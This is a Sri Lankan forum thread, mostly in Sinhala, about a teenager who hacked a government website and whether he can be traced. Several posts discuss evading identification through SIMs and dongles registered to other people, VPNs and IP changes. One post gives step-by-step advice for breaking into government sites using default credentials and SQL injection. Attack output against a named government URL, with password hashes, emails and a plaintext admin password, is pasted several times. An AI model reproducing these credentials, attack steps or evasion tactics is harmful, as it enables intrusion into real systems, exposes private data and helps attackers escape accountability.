සිරාම වැඩ්ඩෙක්...

Phone Hora

Well-known member
  • Apr 19, 2016
    4,950
    7,959
    113
    ලොල් සීන් එක. .
    ෆෝන් වලට විතරක් නෙවෙයි ඩොන්ගල් වලට රවුටර් වලට IMEI තියෙනවා. .


    හැමතැනම පකයෝ වගේ කියෙව්වාට අර අවුරුදු 17 පොඩි එකාගේ දැනුමෙන් අරික්කාලක් නෑ මේ ඉන්න සමහර ගොබ්බයොන්ට...

    :lol::lol::lol::lol::lol:
     

    XibitZ

    Well-known member
  • Oct 10, 2008
    13,243
    1
    4,032
    113
    Moratuwa
    trace කරන්න පුලුන්. dynamic ip උනත් isp ල ගල ඒ ඒ ip එක අදාල වෙලාවේ asign වෙලා තියෙන්නේ කාටද කිනඑක log වෙනව. මේ ලොග් ගොඩක් ලොකු ඒව. උසාවි නියෝගයකින් මේව ගන්න පුලුවන්, public wifi or ip ටනල් එකක් යූස් කරොත් අමාරු වෙනව. ප්‍රොක්සිය පිටරටක එකක් නම් එයාලගෙන් අපේ රියල් Ip එක ගන්න ලේසි නෑ. ඒ වගේම අදාල ip අසයින් වෙන ඩිවයිස් වල විස්තරත් එයාලගේ ලොග් වල තියෙනව.

    මෙහෙම කියන්නම්කෝ. .
    IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
    දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .

    දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
    අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
    සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ? :dull:
     

    your_love

    Well-known member
  • Apr 7, 2012
    14,067
    1
    11,096
    113
    මෙහෙම කියන්නම්කෝ. .
    IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
    දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .

    දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
    අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
    සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ? :dull:

    Location eka Hoyaganna puluwan Log wena
     

    upulpdn

    Well-known member
  • Mar 13, 2009
    34,672
    2,251
    113
    Kurunegala
    මෙහෙම කියන්නම්කෝ. .
    IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
    දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .

    දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
    අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
    සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ? :dull:

    Sim eke ayithikarayagen ahanawa katada connection aran dunne kiyala :dull:
     

    GT9

    Well-known member
  • Jun 22, 2013
    1,564
    167
    63
    [email protected]
    මෙහෙම කියන්නම්කෝ. .
    IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
    දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .

    දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
    අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
    සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ? :dull:

    මචං අපි vpn එකකට කනෙක්ට් වෙන්නෙත් අපේ isp අපිට දෙන ip එකෙන් නිසා කොයිවෙලෙත් isp දන්නව ip එක. නමුත් අපි vpn එකට කනෙක්ට් වෙලා වෙබ් එකකට යනකොට වෙබ් එකේ ලොග් වෙන්නේ අපිට vpn එකෙන් දුන්න ip එක. සෝ ඒනිසා ප්‍රයෝගිකව බැහැ පුද්ගලයව අදුන ගන්න.

    ඒ වගේම ඩොන්ගල් එක , රවුටරේ තියන ගියෝ ලොකේෂන් එක එක isp ට ගන්න පුලුවන් ඕන වෙලාවක. ඒත් වෙබ් එකේ රෙකෝඩ් වෙන්නේ vpn ip එක නිසා ඒ අනුව ට්‍රැක් කරන්න බෑ. :P

    ගොඩක් රටවල මේ කේස් එක හින්දම vpn බාවිතය තහනම් කරල තියෙන්නේ. vpn එකකට කනෙක්ට් උනා කියල ඩිටෙක්ට් උනොත් කනෙක්ෂන් එක කපනව එවෙලම හෝ ඇක්ටිවිටීස් ටික කාලයක් ට්‍රැක් කරල අනවශ්‍ය වැඩ කරල තිබ්බොත් නීතිමය පියවර ගන්නව.
     
    Last edited:

    biskubiskulahila

    Well-known member
  • May 4, 2013
    1,001
    467
    83
    අල්ලගත්ත ක්‍රම ටික පොඩ්ඩක් දන්න එකෙක් කියපන්කෝ. . මට මතක මේ ටික තමයි. .

    IMEI නම්බර් එක හරහා ලියාපදින්චි පුද්ගලයව සොයාගැනීම. .
    ෆෝන් නම්බර් එක හරහා පුද්ගලයව සොයාගැනීම. .
    IMEI නම්බර් සහිත ෆෝන් එකෙන් සහ සිම් එකෙන් කෝල්ස් ගත්ත නම්බර්ස් හරහා පුද්ගලයව සොයාගැනීම. .
    රීලෝඩ් දමන අවස්තාවක ඒ රීලෝඩ් දමන ස්තානය හරහා පුද්ගලයව සොයාගැනීම. . (සී.සී ටී.වී මගින් හෝ වෙනත් ක්‍රම මගින්)

    ඔය විදි වලට අනුව නම් IMEI නම්බර් එක තමන්ගේ නමට නැත්නම්. .
    සිම් එකත් තමන්ගේ නමට නැත්නම් තමන් අදුනන අයට කෝල්ස් අරනුත් නැත්තන්. .
    රිලෝඩ් දාපු විදිය හොයාගන්නත් නැත්තන්. .
    ඉන්ටර්නෙට් බවිතයේදි අයි.පී වෙනස් කරලා ඉන්ටර්නෙට් ගිහින් නම් කරපු කෙනාව හොයන්න විදියක් නෑ නේද?
    මට අමතක වෙච්ච දෙයක් තියේද? :rolleyes:

    IMEI num eken neme machan mama hithanne.
    mewage dekadi mulinma hack krapu eka traces thiyala gihin da kiyala balanna ona. samanyen hack ekakadi wena crime ekakadi wagema traces thiyanwa. wisheshayenma connect una ip wala log ekak thiyanwanam saha mu connect wela thiyenne ip spoofing kranne nathuwanam lesiyenma hoyaganna puluwan.
    IMEI thiyene cellular device walata witharai. u hack eka kare mobile connection ekakinnam oeka hoyaganna puluwan machan mokada IMEI details walin ownner hoyaganna puluwan.
    ehema nathiunath ip eka hide kre naththam isp ge dynamic ip assign krapu log eke muge wisthara thiyanawa.
    godakwita oken thamai mattu wenna aththe. podi ekek hinda othanin mattu wei kiyala lokuwata hithanne nathuwathi.

    kohomath oya godak government sites hadala thiyenne icta eken hari commis kuttiya dena podi IT company hari. icta eketh godakwelawata trainnees la wage thamai owa develop kranne, mokada lokko ice para ne. oya godak sites walata lesiyenma sql injection krnna puluwan.
    mama issara elakiri hari wena kohe hari net eke thread ekakuth dakka mathakai exam dept eke website ekata sql injection krana hati.
    godak welawata okun site hadanne framework walin. ithin username thiyenne defaul ewamai. login url wenas krnne na. security monitor karanne na.
    (website dev waladi security kiyanne wenama paththak, dev krnna wage welawak yanwa hond site ekaka securtiy walata)

    ithin oka hack kranawa kiyanne maha loku deyak nemei samanya danumak thiyana ekekta.
    owa karana ewun promote krana ekanam honda wadak nemei. habai ethical hacking gana awabodayak dunnata kamak na.
    worpress, joomla, cakephp, drupal wage frameworks danna un innawanam onnnam nikamata governemnt site tikakata gihin try ekak deepan.
    1) mulin balapan site ekaka dev krapu framework eka mokakda kiyala. html source eka balala danna ekekta oka hithaganna puluwan.
    2)admin ekata, sql server (phpmyadmin most of the time), web server ekata ehema log wenna puluwanda balapan. wisheshayenma server ekata ftp wenna puluwanda kiyala.
    3) samanyen hama web server ekakama, db ekakama default password ena widiyak thiyanwa. eka gahala balapan. (eg: phpmyadmin databases username is root and password is empty. in postgresql, most of the time username is postgres, in wordpress admin try admin, admin or admin, password................like that)
    4) ehemath barinam sql injection ekak deela balanna. youtube eke onatharam turorial thiyanwa
    5) mama me kiwe o/l mattame eekta unath lesiyen kranna puluwan dewal tikak. thawa advanced widi thiyanwa, owa dala hire yanna wei. eth godak government website wala oya basicma tikawath setup wela na. :(


    awul thiyanwanam unta call ekak deela kiyapan. balu wada krnna epa. tamnge rate dewal ne.
     

    your_love

    Well-known member
  • Apr 7, 2012
    14,067
    1
    11,096
    113
    මචං අපි vpn එකකට කනෙක්ට් වෙන්නෙත් අපේ isp අපිට දෙන ip එකෙන් නිසා කොයිවෙලෙත් isp දන්නව ip එක. නමුත් අපි vpn එකට කනෙක්ට් වෙලා වෙබ් එකකට යනකොට වෙබ් එකේ ලොග් වෙන්නේ අපිට vpn එකෙන් දුන්න ip එක. සෝ ඒනිසා ප්‍රයෝගිකව බැහැ පුද්ගලයව අදුන ගන්න.

    ඒ වගේම ඩොන්ගල් එක , රවුටරේ තියන ගියෝ ලොකේෂන් එක එක isp ට ගන්න පුලුවන් ඕන වෙලාවක. ඒත් වෙබ් එකේ රෙකෝඩ් වෙන්නේ vpn ip එක නිසා ඒ අනුව ට්‍රැක් කරන්න බෑ. :P

    ගොඩක් රටවල මේ කේස් එක හින්දම vpn බාවිතය තහනම් කරල තියෙන්නේ. vpn එකකට කනෙක්ට් උනා කියල ඩිටෙක්ට් උනොත් කනෙක්ෂන් එක කපනව එවෙලම හෝ ඇක්ටිවිටීස් ටික කාලයක් ට්‍රැක් කරල අනවශ්‍ය වැඩ කරල තිබ්බොත් නීතිමය පියවර ගන්නව.

    mehemath puluwan, Web site eka Hack karapu time ekai, E welawe VPN walata Log una IP tikai analysis karala hoyanna puluwan,Lankawe Wadiya VPN use wenne nathi nisa. Lankawa wage Podi rataka karanna puluwan, But Loku ratawala VPN Sahena Use karana Ratwala Oka karanna amarui.
     

    Mr Dilshan

    Well-known member
  • Jun 16, 2007
    5,439
    759
    113
    මෙහෙම කියන්නම්කෝ. .
    IMEI එකේ අපේ විස්තර නැති ඩොන්ගල් එකක් හරහා වෙන එකෙක්ගේ නමට ගත්ත සිම් එකක් දාන් අයි.පී නම්බර් එකත් චේන්ජ් කරගෙන නෙට් යනවා කියපන්කෝ. .
    දැන් ඔහොම ගිහින් ගේමක් දීලා එනවා. .

    දැන් කොහොමහරි ඔරිජිනල් අයි.පී එක හොයගත්ත කියමුකෝ. .
    අයි.පී එක අයිති සිම් එකේ විස්තරත් ගත්තා කියමුකෝ. .
    සිම් එක තියෙන්නේ වෙන එකෙක්ගේ නමින් නේ. . දැන් කොහොමද වැඩේ කරපු එකාව හොයන්නේ? :dull:

    they trace the usage.
    Have you ever read google or face book agreement. ( I'm also not :P )
    what activities they had done through this sim
     

    GT9

    Well-known member
  • Jun 22, 2013
    1,564
    167
    63
    [email protected]
    mehemath puluwan, Web site eka Hack karapu time ekai, E welawe VPN walata Log una IP tikai analysis karala hoyanna puluwan,Lankawe Wadiya VPN use wenne nathi nisa. Lankawa wage Podi rataka karanna puluwan, But Loku ratawala VPN Sahena Use karana Ratwala Oka karanna amarui.

    ඔව් නමුත් vpn එකක් යූස් කරල නම් මම නම් හිතන් නෑ කරන්න පුලුවන් කියල. vpn එකෙන් දත්ත නොගෙන. ඇමෙරිකා NSA, FBI වගේ නම් දෙයක් නෑ එත් ලංකාවේ මමනම් හිතන්නෑ.

    SQL Injection කරල හැක් කරන ලොකු දෙයක් නොවුනත් ඒතරම් දෙයක් හරි දන්න කෙනෙක් තමන්ගේ සෙකුරිටි ගැන නොහිතපු එක පුදුමයි.

    මම දැක්ක ඇටෑක් කරල තියෙන ඇඩ්රස් එක. query parameter එකක් හරහා පාස් කරල තියෙන්නේ. දැන් තියෙන ගොඩක් framework වල query building active records යූස් වෙන්නේ ඒව වලින් ඔටෝ sql injection protection එක එනව. ඒත් ලංකාවේ ගොඩක් gov වෙබ් සයිට් වල සෙකුරිටි ගොඩක් අවුල්. :P
     

    GT9

    Well-known member
  • Jun 22, 2013
    1,564
    167
    63
    [email protected]
    Code:
    ###########################
    # Host IP: 184.173.17.142 #
    # Web Server: Apache      #
    # DB Server: MySQL >=5    #
    ###########################
    Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'
     
    *Current DB: presiden_db
     
    *Tables Name:                Columns
    writings       
    users ------->  timestamp email userlevel userid password username
    speeches       
    pre_users ------->  userLevel password userName userID
    pre_news       
    pre_events     
    photogallery   
    photoalbumtitle
    photoalbum     
    inter  
    homeimage      
    banned_users   
    active_users   
    active_guests  
     
    *Data:
     
        username              password                             email                    userlevel
        useronly    b420243d6f14831b8a1098ee10fb0450        [email protected]               1
         admin      8a8644842043beaf6fa725e1b71675b3        [email protected]               9
     
     
     
          userName                         password                      UserLevel
           admin                            gvt123                          1

    Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'

    ඔය තියෙන්නේ :P කස්ටම් php එකකින් තමයි photo album view කරන්න හදල තියෙන්නේ. cms වල අනම් මනම් Plugins දාල නැත්නම් by default sql injection වලට ආරක්ෂාව තියෙනව.

    අනික බලන්න යූසර් නේම් එක හෙනම කොමන්

    අනික password hashing algo එකත් හෙනම පරන එකක්, md5 ද කොහෙද, දැනට හොදම blowfish slow password hashing algo එක. ඒකේ characters 60 ක් තියෙනව.

    ගොඩක් gov sites ඔහොම තමයි.

    ඔච්චර දගලන්න දෙයක් නෑ Jekyll වගේ static generator එකක් යූස් කරානම් කිසි කරදරයක් නෑ.
     

    XibitZ

    Well-known member
  • Oct 10, 2008
    13,243
    1
    4,032
    113
    Moratuwa
    Location eka Hoyaganna puluwan Log wena

    ඔයවැඩේටම ලොග් වෙන්නේ වෙන තැනකින් නම්? :dull:


    Sim eke ayithikarayagen ahanawa katada connection aran dunne kiyala :dull:

    අයිතිකාරයටත් හොරෙන් ගත්ත එකක් නම්? :dull:


    මචං අපි vpn එකකට කනෙක්ට් වෙන්නෙත් අපේ isp අපිට දෙන ip එකෙන් නිසා කොයිවෙලෙත් isp දන්නව ip එක. නමුත් අපි vpn එකට කනෙක්ට් වෙලා වෙබ් එකකට යනකොට වෙබ් එකේ ලොග් වෙන්නේ අපිට vpn එකෙන් දුන්න ip එක. සෝ ඒනිසා ප්‍රයෝගිකව බැහැ පුද්ගලයව අදුන ගන්න.

    ඒ වගේම ඩොන්ගල් එක , රවුටරේ තියන ගියෝ ලොකේෂන් එක එක isp ට ගන්න පුලුවන් ඕන වෙලාවක. ඒත් වෙබ් එකේ රෙකෝඩ් වෙන්නේ vpn ip එක නිසා ඒ අනුව ට්‍රැක් කරන්න බෑ. :P

    ගොඩක් රටවල මේ කේස් එක හින්දම vpn බාවිතය තහනම් කරල තියෙන්නේ. vpn එකකට කනෙක්ට් උනා කියල ඩිටෙක්ට් උනොත් කනෙක්ෂන් එක කපනව එවෙලම හෝ ඇක්ටිවිටීස් ටික කාලයක් ට්‍රැක් කරල අනවශ්‍ය වැඩ කරල තිබ්බොත් නීතිමය පියවර ගන්නව.

    කොහොමහරි රියල් අයි.පී එක හොයාගත්ත කියමුකෝ. .
    ඒ හොයාගත්තත් සිම් එක රෙජිස්ටෙර් වෙලා තියෙන්නේ වෙන එකෙක්ගේ නමටනේ. .
    එතකොට ඌටනේ කේස් එක. .


    IMEI num eken neme machan mama hithanne.
    mewage dekadi mulinma hack krapu eka traces thiyala gihin da kiyala balanna ona. samanyen hack ekakadi wena crime ekakadi wagema traces thiyanwa. wisheshayenma connect una ip wala log ekak thiyanwanam saha mu connect wela thiyenne ip spoofing kranne nathuwanam lesiyenma hoyaganna puluwan.
    IMEI thiyene cellular device walata witharai. u hack eka kare mobile connection ekakinnam oeka hoyaganna puluwan machan mokada IMEI details walin ownner hoyaganna puluwan.
    ehema nathiunath ip eka hide kre naththam isp ge dynamic ip assign krapu log eke muge wisthara thiyanawa.
    godakwita oken thamai mattu wenna aththe. podi ekek hinda othanin mattu wei kiyala lokuwata hithanne nathuwathi.

    kohomath oya godak government sites hadala thiyenne icta eken hari commis kuttiya dena podi IT company hari. icta eketh godakwelawata trainnees la wage thamai owa develop kranne, mokada lokko ice para ne. oya godak sites walata lesiyenma sql injection krnna puluwan.
    mama issara elakiri hari wena kohe hari net eke thread ekakuth dakka mathakai exam dept eke website ekata sql injection krana hati.
    godak welawata okun site hadanne framework walin. ithin username thiyenne defaul ewamai. login url wenas krnne na. security monitor karanne na.
    (website dev waladi security kiyanne wenama paththak, dev krnna wage welawak yanwa hond site ekaka securtiy walata)

    ithin oka hack kranawa kiyanne maha loku deyak nemei samanya danumak thiyana ekekta.
    owa karana ewun promote krana ekanam honda wadak nemei. habai ethical hacking gana awabodayak dunnata kamak na.
    worpress, joomla, cakephp, drupal wage frameworks danna un innawanam onnnam nikamata governemnt site tikakata gihin try ekak deepan.
    1) mulin balapan site ekaka dev krapu framework eka mokakda kiyala. html source eka balala danna ekekta oka hithaganna puluwan.
    2)admin ekata, sql server (phpmyadmin most of the time), web server ekata ehema log wenna puluwanda balapan. wisheshayenma server ekata ftp wenna puluwanda kiyala.
    3) samanyen hama web server ekakama, db ekakama default password ena widiyak thiyanwa. eka gahala balapan. (eg: phpmyadmin databases username is root and password is empty. in postgresql, most of the time username is postgres, in wordpress admin try admin, admin or admin, password................like that)
    4) ehemath barinam sql injection ekak deela balanna. youtube eke onatharam turorial thiyanwa
    5) mama me kiwe o/l mattame eekta unath lesiyen kranna puluwan dewal tikak. thawa advanced widi thiyanwa, owa dala hire yanna wei. eth godak government website wala oya basicma tikawath setup wela na. :(


    awul thiyanwanam unta call ekak deela kiyapan. balu wada krnna epa. tamnge rate dewal ne.

    කොහොමහරි රියල් අයි.පී එක හොයාගත්ත කියමුකෝ. .
    ඒ හොයාගත්තත් සිම් එක රෙජිස්ටෙර් වෙලා තියෙන්නේ වෙන එකෙක්ගේ නමටනේ. .
    එතකොට ඌටනේ කේස් එක. . :dull:


    they trace the usage.
    Have you ever read google or face book agreement. ( I'm also not :P )
    what activities they had done through this sim

    දැන් මචන් මම කලින් කියපු විදියට සිම් එක වෙන එකෙක්ගේ නමින් ගත්තනම් අනිත් ඒවත් වෙන නම් වලින්නම් තියෙන්නේ. .
    මේ පලවෙනි පාරටනම් ඒ ඩොන්ගල් එක සිම් එක යූස් කරන්නේ මීට කලින් නෙට් ගිහින් නැත්තන් වැඩේ කරපු ගමන් ඩොන්ගල් එකත් සිම් එකත් යූස් කරන එක නැවැත්තුවොත්
    ලේසියෙන් හොයන්න බැරිවෙන්න ෆේක් අයි.පී එකකුත් දාලා කියලා හිතපන්කෝ. . කොහොමද කරපු කෙනාව හොයන්නේ?
     

    ahsk123

    Well-known member
  • Nov 5, 2008
    6,140
    746
    113
    33
    ගාල්ලේ
    Code:
    ###########################
    # Host IP: 184.173.17.142 #
    # Web Server: Apache      #
    # DB Server: MySQL >=5    #
    ###########################
    Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'
     
    *Current DB: presiden_db
     
    *Tables Name:                Columns
    writings       
    users ------->  timestamp email userlevel userid password username
    speeches       
    pre_users ------->  userLevel password userName userID
    pre_news       
    pre_events     
    photogallery   
    photoalbumtitle
    photoalbum     
    inter  
    homeimage      
    banned_users   
    active_users   
    active_guests  
     
    *Data:
     
        username              password                             email                    userlevel
        useronly    b420243d6f14831b8a1098ee10fb0450        [email protected]               1
         admin      8a8644842043beaf6fa725e1b71675b3        [email protected]               9
     
     
     
          userName                         password                      UserLevel
           admin                            gvt123                          1

    Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'

    ඔය තියෙන්නේ :P කස්ටම් php එකකින් තමයි photo album view කරන්න හදල තියෙන්නේ. cms වල අනම් මනම් Plugins දාල නැත්නම් by default sql injection වලට ආරක්ෂාව තියෙනව.

    අනික බලන්න යූසර් නේම් එක හෙනම කොමන්

    අනික password hashing algo එකත් හෙනම පරන එකක්, md5 ද කොහෙද, දැනට හොදම blowfish slow password hashing algo එක. ඒකේ characters 60 ක් තියෙනව.

    ගොඩක් gov sites ඔහොම තමයි.

    ඔච්චර දගලන්න දෙයක් නෑ Jekyll වගේ static generator එකක් යූස් කරානම් කිසි කරදරයක් නෑ.

    උඹ ඔය විස්තර දාලා හදන්නේ මේකේ උන්වත් හිරේ අරින්නද :angry:
     

    BruceWayne92

    Well-known member
  • Oct 8, 2013
    12,280
    1
    13,170
    113
    Gotham City
    Code:
    ###########################
    # Host IP: 184.173.17.142 #
    # Web Server: Apache      #
    # DB Server: MySQL >=5    #
    ###########################
    Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'
     
    *Current DB: presiden_db
     
    *Tables Name:                Columns
    writings       
    users ------->  timestamp email userlevel userid password username
    speeches       
    pre_users ------->  userLevel password userName userID
    pre_news       
    pre_events     
    photogallery   
    photoalbumtitle
    photoalbum     
    inter  
    homeimage      
    banned_users   
    active_users   
    active_guests  
     
    *Data:
     
        username              password                             email                    userlevel
        useronly    b420243d6f14831b8a1098ee10fb0450        [email protected]               1
         admin      8a8644842043beaf6fa725e1b71675b3        [email protected]               9
     
     
     
          userName                         password                      UserLevel
           admin                            gvt123                          1
    Target: http://www.president.gov.lk/photoAlbumViewThumbs.php?titleId=20110421111233'

    ඔය තියෙන්නේ :P කස්ටම් php එකකින් තමයි photo album view කරන්න හදල තියෙන්නේ. cms වල අනම් මනම් Plugins දාල නැත්නම් by default sql injection වලට ආරක්ෂාව තියෙනව.

    අනික බලන්න යූසර් නේම් එක හෙනම කොමන්

    අනික password hashing algo එකත් හෙනම පරන එකක්, md5 ද කොහෙද, දැනට හොදම blowfish slow password hashing algo එක. ඒකේ characters 60 ක් තියෙනව.

    ගොඩක් gov sites ඔහොම තමයි.

    ඔච්චර දගලන්න දෙයක් නෑ Jekyll වගේ static generator එකක් යූස් කරානම් කිසි කරදරයක් නෑ.
    ලංකාවෙ ගොඩාක් රජයේ මෙන්ම පෞද්ගලික වෙබ්සයිට් වල උඹ කිව්වා වගෙ ආරක්ෂාව නැහැ බන්. පොඩි මෙතඩ් එකක් පාවිච්චි කරොත් හැක් වෙනවා. හැබැයි මෙතඩ් එක පොඩි උනත් ලංකාව වගේ රටක මේ පොඩි එකා කරපු දී නීති විරොධි වගේම වැඩ කාරයෙක් එක්තරා විදියක.
     

    XibitZ

    Well-known member
  • Oct 10, 2008
    13,243
    1
    4,032
    113
    Moratuwa
    උඹ ඔය විස්තර දාලා හදන්නේ මේකේ උන්වත් හිරේ අරින්නද :angry:

    ත්‍රේඩ් එකේ රිප්ලයි කරපු සේරමව CID එකෙන් කුදලන් යයිද දන්නේ නෑ. . :baffled:
     

    powers

    Well-known member
  • Dec 8, 2008
    3,356
    480
    83
    Nittambuwa
    තොත්ත බබා;20606709 said:
    අහුවෙන්නේ නැති වෙන විදිහට කරානං තමා වැඩ්ඩ වෙන්නෙ

    dan oka u kara kiwwama podi piliganimak tiyanawane ban..nathnam u oka kara kiyala kawda danne..ilanga para u ahuwenna nathi wenna karai wena ratakata gihin.:D
     

    BruceWayne92

    Well-known member
  • Oct 8, 2013
    12,280
    1
    13,170
    113
    Gotham City
    dan oka u kara kiwwama podi piliganimak tiyanawane ban..nathnam u oka kara kiyala kawda danne..ilanga para u ahuwenna nathi wenna karai wena ratakata gihin.:D

    අහු උනේ නැත්තම් ඌ වැඩ්ඩෙක්ද නැද්ද කියන එක දන්නෙ නැහැ නෙ බන් .
    මන් දැක්කා සමහරක් ෆේස්බුක් කමෙන්ට්ස්. හැක් කරපු එකාව දැනටම බෙදාගෙන ඉවරයි කට්ටිය.
    සමහරු කියනවා නුවර කොල්ලෙක් ළු, සමහරු කියනවා ඌ අපෙ ඉස්කෝලෙලු .අනෙ මන්දා බන් අපෙ එවුන්ගෙ මේ කොලනි දූපත් මානසික මට්ටම කවදා හොඳ වෙයි ද කියාලා